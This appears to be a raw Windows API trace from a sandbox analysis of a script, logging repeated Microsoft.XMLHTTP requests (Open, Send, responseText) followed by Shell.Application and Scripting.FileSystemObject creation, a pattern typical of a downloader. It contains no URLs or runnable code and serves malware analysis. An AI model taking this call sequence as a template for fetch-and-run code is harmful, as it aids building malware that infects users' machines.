	[0315.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7238) returned 0x0
	[0315.408] ??2@YAPEAX_K@Z () returned 0x62f330
	[0315.408] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7238, pUnkSite=0x62f330) 
	[0315.408] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0315.408] XMLHTTPRequest:IUnknown:Release (This=0x49c7238) returned 0x0
	[0315.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0315.409] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0315.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.409] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0315.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0315.409] longjmp () 
	[0315.409] longjmp () 
	[0315.409] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0315.409] SysStringLen (param_1=0x0) returned 0x0
	[0315.409] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0315.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0315.409] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0315.409] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0315.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0315.409] ??2@YAPEAX_K@Z () returned 0x62f310
	[0315.409] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0315.409] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0315.410] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0315.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0315.410] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0315.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.410] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0315.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0315.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0315.410] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0315.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0316.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0316.375] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0316.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0316.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0316.376] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0316.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0316.376] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0316.376] SysStringLen (param_1=0x0) returned 0x0
	[0316.376] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0316.376] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0316.376] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0316.377] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0316.377] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0316.377] ??2@YAPEAX_K@Z () returned 0x62f350
	[0316.377] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0316.377] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0316.377] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0316.377] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0316.377] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0316.377] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0316.378] SysStringLen (param_1=0x0) returned 0x0
	[0316.378] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0316.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0316.381] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0316.381] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0316.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0316.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0316.381] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0317.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0317.125] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0317.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0317.126] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0317.126] SysStringLen (param_1=0x0) returned 0x0
	[0317.127] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0317.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0317.127] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0317.127] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0317.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0317.127] ??2@YAPEAX_K@Z () returned 0x62f310
	[0317.127] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0317.127] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0317.127] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0317.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0317.127] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0317.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.127] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0317.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0317.130] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0317.130] SysStringLen (param_1=0x0) returned 0x0
	[0317.130] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0317.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0317.130] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0317.130] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0317.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0317.130] ??2@YAPEAX_K@Z () returned 0x62f330
	[0317.131] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0317.131] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0317.131] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0317.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0317.131] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0317.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0317.131] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0317.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0317.131] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0317.131] SysStringLen (param_1=0x0) returned 0x0
	[0317.131] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0317.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0317.131] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
